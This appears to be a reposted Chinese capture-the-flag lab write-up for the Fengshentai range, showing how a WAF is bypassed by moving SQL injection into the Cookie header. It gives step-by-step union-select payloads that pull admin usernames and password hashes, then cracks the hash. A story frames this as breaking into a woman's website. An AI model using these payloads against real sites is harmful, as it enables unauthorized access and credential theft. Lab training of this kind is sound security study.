封神台靶場:第二章:遇到阻難!繞過WAF過濾!【配套課時:SQL注入攻擊原理 實戰演練】


尤里在得到女神家網站密碼后,卻發現注入點權限很小,憑他的皮毛技術也沒找到網站后台,

這是尤里通過旁站查詢,他發現了女神家網站是用的主機空間托管,
他立刻掃描旁站,果然發現一個站點,且后台是默認路徑……
尤里冷笑一聲行動了起來,這時有一層防火牆攔在了他的面前。。

靶場地址

https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb
請求方式    GET
閉合方式    
注入方式    Cookie
注入代碼

測試

?id=169    正常訪問
?id=171    正常訪問
可以看出id值是跟數據庫有交互的。
?id=169'    頁面限制---WAF

經過研究發現,cookie可能存在注入點

插件是火狐的ModHeader插件,通過插件擴展搜索直接安裝,這里就不分享了。

輸入id=171',發現有報錯,這里存在報錯注入。

 由於Cookie是放在HTTP中通過URL進行傳輸的,空格的URL編碼

id=171+and+1=1    頁面正常 
id=171+and+1=2    頁面報錯

跟第一章一樣,采用order by確定字段數量

order by 10頁面顯示正常(記得把空格換成+)

id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

id=12345+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

 

 使用https://cmd5.com/幫助解密

  密碼為  welcome

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM